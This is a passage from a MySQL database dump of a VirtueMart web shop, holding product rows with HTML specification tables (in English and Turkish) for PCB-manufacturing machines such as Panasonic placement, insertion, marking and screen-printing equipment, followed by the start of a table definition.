style=\"text-align: left;\">Origin: Turkey</li>\r\n<li style=\"text-align: left;\">Manufacturer: 3S Technologies</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<h2>Applications</h2>\r\n<ul>\r\n<li style=\"text-align: left;\">Prototype PCB&nbsp; (tek taraflı / &ccedil;ift taraflı)</li>\r\n<li style=\"text-align: left;\">Wood processing</li>\r\n<li style=\"text-align: left;\">Polycarbon / Acrylic cutting</li>\r\n<li style=\"text-align: left;\">Aluminum processing / drilling</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" style=\"border-collapse: collapse;\" cellspacing=\"0\" cellpadding=\"0\"><colgroup><col span=\"6\" /> </colgroup>\r\n<tbody>\r\n<tr style=\"line-height: 200%; background-color: #d22060; color: #ffffff;\">\r\n<td style=\"text-align: center;\">&nbsp; Model&nbsp; &nbsp;&nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; X-Width&nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; X-Working Area&nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; Y-Width&nbsp;&nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; Y-Working Area&nbsp; &nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; Z-Working Height&nbsp;&nbsp;</td>\r\n</tr>\r\n<tr style=\"line-height: 150%;\">\r\n<td style=\"text-align: center;\">750x750</td>\r\n<td style=\"text-align: center;\">750mm</td>\r\n<td style=\"text-align: center;\">550mm</td>\r\n<td style=\"text-align: center;\">750mm</td>\r\n<td style=\"text-align: center;\">520mm</td>\r\n<td style=\"text-align: center;\">122mm</td>\r\n</tr>\r\n<tr style=\"line-height: 150%; background-color: #d07193; color: #ffffff;\">\r\n<td style=\"text-align: center;\">1000x1000</td>\r\n<td style=\"text-align: center;\">1000mm</td>\r\n<td style=\"text-align: center;\">800mm</td>\r\n<td style=\"text-align: center;\">1000mm</td>\r\n<td style=\"text-align: center;\">770mm</td>\r\n<td style=\"text-align: center;\">122mm</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\">1500x1500</td>\r\n<td style=\"text-align: center;\">1500mm</td>\r\n<td style=\"text-align: center;\">1300mm</td>\r\n<td style=\"text-align: center;\">1500mm</td>\r\n<td style=\"text-align: center;\">1270mm</td>\r\n<td style=\"text-align: center;\">122mm</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p>&nbsp;</p>','3S-CNC-01-1500x1500','','','','3s-cnc-01-1500x1500'),(53,'Laser Marking Machine','<h2 style=\"text-align: left;\">Panasonic Laser Marking Machine</h2>\r\n<ul style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; text-align: start;\">\r\n<li style=\"text-align: left;\">\r\n<p>Lazer Markalama Makinesi</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>Y&uuml;ksek Hızlı (3000 mm/s)</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>Full otomatik ve inline</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>Min. 0.1 x 0.1mm karakter boyutu</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>2D barkod basma kabiliyeti</p>\r\n</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table id=\"zebra-blue\" style=\"margin-left: 30px; border: 0px solid #00b8ff; border-color: 000000; border-width: 0px;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"margin-left: 30px;\">\r\n<div><span>PCB Dimensions</span></div>\r\n</td>\r\n<td>\r\n<div>L 50mm xW50mm - L510mm x W460mm</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div>PCB Weight</div>\r\n</td>\r\n<td>\r\n<div>Max. 3 kg</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div>PCB Thickness</div>\r\n</td>\r\n<td>\r\n<div><span>0..3 - 8mm</span></div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div>PCB Exchange Time</div>\r\n</td>\r\n<td>\r\n<div>Max. 4 sn</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div>Weight</div>\r\n</td>\r\n<td>\r\n<div>540 kg (Main body), 31kg (Fume extractor)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div><span>Dimensions</span></div>\r\n</td>\r\n<td>\r\n<div><span>W912mm x D1772mm x H1487mm (fume extractor@rear)&nbsp; &nbsp; &nbsp;</span></div>\r\n<div><span>W1422mm x D1545mm x H1487 (fume extractor@side)</span></div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>&nbsp;</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div><span>Marking Field</span></div>\r\n</td>\r\n<td>\r\n<div><span>55mm x 55mm</span></div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div><span>Character Width / Height</span></div>\r\n</td>\r\n<td>\r\n<div>&lt;span\"&gt;0.1mm - 55m2</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div><span>Min. Cell Size</span></div>\r\n</td>\r\n<td>\r\n<div><span>Min. 0.1mm x 0.1mm</span></div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div><span>Marking Speed</span></div>\r\n</td>\r\n<td>\r\n<div><span>Max. 3000mm/s</span></div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div><span>Character Type</span></div>\r\n</td>\r\n<td>\r\n<div><span>English alphabet &amp; numerals</span></div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div><span>Barcode Types</span></div>\r\n</td>\r\n<td>\r\n<div><span>CODE39, CODE128, ITF, NW-7, JAN (EAN) / UPC</span></div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div><span>2D barcode Types</span></div>\r\n</td>\r\n<td>\r\n<div><span>QR Code, Micro QR Code, iQR Code, Data Matrix, GS1 Data Matrix</span></div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','LPS-C','','','','lps-c'),(56,'Screen Printer - Automatic','<h2>Panasonic SPG Automatic Screen Printer</h2>\r\n<p>&nbsp;</p>\r\n<ul style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; text-align: start;\">\r\n<li>\r\n<p class=\"O\" style=\"text-align: left;\"><span>Uni-Floating baskı metodu ile kartın eğikliğinden bağımsız m&uuml;kemmel dolgu performansı</span></p>\r\n</li>\r\n</ul>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<p><span style=\"position: absolute; left: -53.1719px;\">?</span><span>Hafif temizlik y&ouml;ntemi ile a&ccedil;ıklıklardaki flux kurumaz ve kararlı miktarda lehim ge&ccedil;işi&nbsp;sağlanır</span></p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p class=\"O\"><span style=\"font-size: 6px;\"><span style=\"position: absolute; left: -53.1719px;\">?</span></span><span>Gelişmiş bı&ccedil;ak yapısı lehimin baskı alanı dışına &ccedil;ıkmasını engeller ve lehim israfını &ouml;nler</span></p>\r\n</li>\r\n<li>\r\n<p class=\"O\" style=\"text-align: left;\"><span style=\"font-size: 6px;\"><span style=\"position: absolute; left: -53.1719px;\">?</span></span><span>Geniş baskı veritabanı ile baskı parametreleri otomatik ayarlanır</span></p>\r\n</li>\r\n</ul>\r\n<p>&nbsp;&nbsp;</p>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; width: 463px; border-collapse: collapse; margin-left: 30px;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"height: 17.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"23\">MODEL ADI</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">SPG</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Model No</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">NM-EJP6A</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">PCB Boyutları</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">L 50mm x W 50mm -&nbsp; L 510mm x W 460mm</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">D&ouml;ng&uuml; Zamanı</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">6.5 sn + Baskı S&uuml;resi</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Hassasiyet</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">&plusmn;12.5 &micro;m</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">&Ccedil;er&ccedil;eve Boyutları</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">L 736 x W 736, L 650 x W 550 (Dikey Durumda)</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">G&uuml;&ccedil; Kaynağı</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">1 faz AC 200 V&nbsp; 1.4 kVA</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Hava Kaynağı</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">0,5 MPa, 30 L/min (A.N.R)</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Boyutlar</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">W 1580 mm x D 1800mm x H 1500mm</td>\r\n</tr>\r\n<tr style=\"height: 14.25pt; margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"128\" height=\"19\">Ağırlık</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">1500kg</td>\r\n</tr>\r\n</tbody>\r\n</table>','SPG','','','','spg'),(55,'NPM-VF Odd-Form Inserter','<h2>NPM-VF ODD-FORM INSERTION MACHINE</h2>\r\n<p> </p>\r\n<p> </p>\r\n<table id=\"zebra-blue\">\r\n<tbody>\r\n<tr>\r\n<td>PCB dimensions </td>\r\n<td><span style=\"text-align: start;\">L50mm x W50mm - L510mm x W460mm</span> </td>\r\n</tr>\r\n<tr>\r\n<td>Max. PCB mass</td>\r\n<td>Upto 3kg </td>\r\n</tr>\r\n<tr>\r\n<td>PCB thickness </td>\r\n<td>0.3 - 8mm </td>\r\n</tr>\r\n<tr>\r\n<td>PCB Flow</td>\r\n<td>Left =&gt; Right / Left &lt;= Right </td>\r\n</tr>\r\n<tr>\r\n<td>Insertion direction </td>\r\n<td>360 (+/- 180) degrees </td>\r\n</tr>\r\n<tr>\r\n<td>Insertion push force </td>\r\n<td>Upto 100N </td>\r\n</tr>\r\n<tr>\r\n<td>PCB Exchange time </td>\r\n<td>4.5s </td>\r\n</tr>\r\n<tr>\r\n<td>Applicable components </td>\r\n<td>\r\n<p>Max. dimensions: L130mm x W35mm x H60mm / L150mm x W38mm x H29mm</p>\r\n<p>Max. component mass: 200g </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>3-stations head</td>\r\n<td>\r\n<p>Tact: Max. 0.65s / component</p>\r\n<p>Body chuck + Nozzle + Nozzle</p>\r\n<p>Body chuck + Nozzle + Swing nozzle</p>\r\n<p>Body chuck + Nozzle + Lead chuck</p>\r\n<p>Body chuck + Swing nozzle + Lead chuck</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>2-station head</td>\r\n<td>\r\n<p>Tact: Max. 0.9s / component</p>\r\n<p>Body chuck + Body chuck</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td>Stick</td>\r\n<td>\r\n<p>S =&gt; Max. component dim: W20 x L80 xH20mm / Max. stick width: 24mm /</p>\r\n<p>         Max. component mass of 2kg in total</p>\r\n<p>L =&gt; Max. component dim: W60 x L80 x H45mm / Max. stick width: 64mm /</p>\r\n<p>        Max. component mass of 2kg in total</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Radial Tape</td>\r\n<td>Max. body dimension: Radius = 20mm &amp; H30mm / Lead pitch: 2.5 / 5.0 / 7.5 / 10.0mm </td>\r\n</tr>\r\n<tr>\r\n<td>Tray</td>\r\n<td>Max. tray dimension: L230 xW335 x D69mm / Max. pallets per feeder: 20 / Max. mass: 20kg </td>\r\n</tr>\r\n<tr>\r\n<td>Bulk</td>\r\n<td>Customized specs </td>\r\n</tr>\r\n<tr>\r\n<td>Machine Configuration</td>\r\n<td>\r\n<p>Front: 30-slots</p>\r\n<p>Rear: 30-slot fixed supply</p>\r\n<p> </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n</tbody>\r\n</table>','NPM-VF','','','','npm-vf'),(45,'Masaüstü','<h2>SPARTAN 8S/8D&nbsp;Masa &Uuml;st&uuml;&nbsp;Dalga Lehimleme&nbsp;Makinesi</h2>\r\n<ul text-align: start;\">\r\n<li>K&uuml;&ccedil;&uuml;k bir alanda tam otomatik bilgisayar kontroll&uuml; lehimleme sistemi</li>\r\n<li>M&uuml;kemmel doğruluk ve tekrar edilebilirlik sağlayan gelişmiş teknoloji</li>\r\n<li>Tek veya &ccedil;ift dalga se&ccedil;ilebilir</li>\r\n<li>Kurşunlu veya kurşunsuz &uuml;retime uygun se&ccedil;ilebilir</li>\r\n<li>Kolay kullanım ve bakım</li>\r\n<li>Nitrojen opsiyonu</li>\r\n</ul>\r\n<p><span ></span></p>\r\n<table border=\"0\" id=\"zebra-blue\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td >MODEL ADI</td>\r\n<td >SPARTAN 8S</td>\r\n<td>SPARTAN 8D</td>\r\n</tr>\r\n<tr>\r\n<td>Kontrol Sistemi</td>\r\n<td >Novastar Bilgisayar Sistemi</td>\r\n<td>Novastar Bilgisayar Sistemi</td>\r\n</tr>\r\n<tr>\r\n<td>Dalga Genişliği</td>\r\n<td >203mm</td>\r\n<td>203mm</td>\r\n</tr>\r\n<tr>\r\n<td >Dalga Y&uuml;ksekliği</td>\r\n<td >0-10mm</td>\r\n<td >0-10mm</td>\r\n</tr>\r\n<tr>\r\n<td >Konvey&ouml;r Hızı</td>\r\n<td>2000mm/dakika</td>\r\n<td>2000mm/dakika</td>\r\n</tr>\r\n<tr>\r\n<td>&Ouml;nısıtıcı Maks. Sıc. ve G&uuml;c&uuml;</td>\r\n<td>150&ordm;C / 3.75kW</td>\r\n<td>150&ordm;C / 3.75kW</td>\r\n</tr>\r\n<tr>\r\n<td >Lehim Pota Kapasitesi</td>\r\n<td >57kg</td>\r\n<td >136kg</td>\r\n</tr>\r\n<tr>\r\n<td >Pota Maks. Sıcaklığı</td>\r\n<td>300&ordm;C</td>\r\n<td >300&ordm;C</td>\r\n</tr>\r\n<tr>\r\n<td >Pota Maks. Sıcaklığı (Kurşunsuz)</td>\r\n<td >350&ordm;C</td>\r\n<td >350&ordm;C</td>\r\n</tr>\r\n<tr>\r\n<td>Pota Maksimum G&uuml;c&uuml;</td>\r\n<td >2.5kW</td>\r\n<td >3.2kW</td>\r\n</tr>\r\n<tr>\r\n<td>K&ouml;p&uuml;k Flux Tankı</td>\r\n<td >2 lt</td>\r\n<td >2 lt</td>\r\n</tr>\r\n<tr>\r\n<td >G&uuml;&ccedil; Kaynağı</td>\r\n<td>1 Faz 220VAC&nbsp;</td>\r\n<td >1 Faz 220VAC&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>','Spartan 8S/8D','','','','spartan-8s-8d-44'),(61,'Max. 92,000cph / Modular / Dual gantry / Single-lane or dual-lane','<h2><span style=\"text-align: left;\">PANASONIC SMD  Placement Machine (Ultra High-Speed)</span></h2>\r\n<ul>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maximum speed: 92,000cph</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">16, 12 or 2 nozzle head options</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Dual gantry</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Single-lane or double-lane modes</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maximum of 510 x 590mm PCB</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">0.030mm placement accuracy</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">01005 ile 100x90mm range of components</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">8 - 104mm feeders + Tray unit</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Superior MMI</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Modular and flexible</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Fast product switching</li>\r\n</ul>\r\n<p style=\"text-align: left; margin-left: 30px;\"> </p>\r\n<table id=\"zebra-blue\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p>MODEL NAME</p>\r\n</td>\r\n<td colspan=\"3\">\r\n<p style=\"text-align: center;\">NPM-D3A / NM-EJM6E</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Head</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>16-nozzle</p>\r\n</td>\r\n<td style=\"text-align: center;\">8-nozzle</td>\r\n<td style=\"text-align: center;\">2-nozzle</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>PCB Dimensions</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"3\">\r\n<p>50x50mm - 510 x 590mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Speed (Max)</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>92,000cph</p>\r\n</td>\r\n<td style=\"text-align: center;\">43,000cph</td>\r\n<td style=\"text-align: center;\">8,500cph</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Component Range</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>03015\" chip -</p>\r\n<p>L6xW6xT3mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>0402\" chip -</p>\r\n<p>L32xW32XT12mm </p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p> 0603\" chip -</p>\r\n<p>L100xW90XT28mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Placement Accuracy</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>±0.037 mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>±0.030 mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>±0.030 mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Max. Feeder No</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"3\">\r\n<p>68 pcs (8mm tape)   </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Component Supply </p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>8 - 56mm feeder</p>\r\n</td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: 11px;\">8 - 56mm feeder</span> </td>\r\n<td style=\"text-align: center;\">\r\n<p><span style=\"font-size: 11px;\">8 - 104mm feeder</span> </p>\r\n<p>Stick: Max 8 pcs</p>\r\n<p>Tray</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Matrix Tray</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>Single tray</p>\r\n</td>\r\n<td style=\"text-align: center;\"> </td>\r\n<td style=\"text-align: center;\"> </td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dimensions</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"3\">\r\n<p>W 832mm x D 2448mm x H 1444mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Weight</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"3\">\r\n<p>1,680kg (only body)</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p> </p>\r\n<p style=\"text-align: left;\"> </p>','NPM-D3A','','','','npm-d3a-1'),(66,'Radial Insertion','<h2 style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px; text-align: start;\">Panasonic High-Speed Radial Insertion Machine (High-density insertion)</h2>\r\n<p style=\"text-align: left;\"> </p>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\"><img src=\"images/panasonic/pana_rh2sb.gif\" alt=\"\" border=\"0\" /> </td>\r\n<td style=\"font-size: 10px;\">\r\n<ul>\r\n<li><strong>0.25 s/component insertion</strong></li>\r\n<li><strong>2.5/5.0/7.5/10 mm pitch component insertion</strong></li>\r\n<li><strong>High-density insertion with the use of guide pins</strong></li>\r\n<li><strong>4 direction insertion (0, 90, -90, 180 degrees)</strong></li>\r\n<li><strong>Component exhaust warning enables non-stop operation</strong></li>\r\n<li><strong>%100 placement with automatic recovery function</strong></li>\r\n<li><strong>LCD touch screen</strong></li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>  </p>\r\n<table id=\"zebra-blue\" style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; margin: auto 4.8pt; border: 1pt outset;\" border=\"1\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">MODEL ADI</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\">\r\n<p style=\"text-align: center; line-height: 14.25pt; margin: 0cm 0cm 0pt;\" align=\"center\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">RG131</span></span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Model No</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\">\r\n<p style=\"text-align: center; line-height: 14.25pt; margin: 0cm 0cm 0pt;\" align=\"center\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">NM-EJR3A   -   NM-EJR4A</span></span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">PCB Dimensions</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">L 50mm x W 50mm -  L 508mm x W 381mm</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Max. speed</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">0,25 s / piece (14,400 CPH)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">No. of component inputs</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">NM-EJR3A =&gt; 40 / NM-EJR4&gt; =&gt; 80 feeders</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Range of components</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Resistors, Electrolytic capacitors, Ceramic capacitors, LEDs, Transistors, Filters, Resistor networks, JIS C0805 (1989) ?Electronic Component Taping?, standard components</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">PCB Exchange Time</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Approx. 2.0 s</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Placement directions</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\"><span style=\"font-size: 10pt;\">0°, 90°, -90°, 180°</span></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial;\"><span style=\"font-size: 12px;\"><b>Electrical source</b></span></span></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">3 faz AC 200 V 5 kVA</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial;\"><span style=\"font-size: 12px;\"><b>Pneumatic</b></span></span></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">0,5 MPa, 80 L/min (A.N.R)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial;\"><span style=\"font-size: 12px;\"><b>Dimensions</b></span></span></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">W 3200 mm x D 2417mm x H 1575mm</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial;\"><span style=\"font-size: 12px;\"><b>Mass</b></span></span></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">2,250kg</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\"> </p>\r\n<p> </p>','RG131','','','','rg131');
/*!40000 ALTER TABLE `fz6t4_virtuemart_products_en_gb` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_products_tr_tr`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_products_tr_tr`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_products_tr_tr` (
  `virtuemart_product_id` int unsigned NOT NULL,
  `product_s_desc` varchar(2000) NOT NULL DEFAULT '',
  `product_desc` text NOT NULL,
  `product_name` varchar(180) NOT NULL DEFAULT '',
  `metadesc` varchar(400) NOT NULL DEFAULT '',
  `metakey` varchar(400) NOT NULL DEFAULT '',
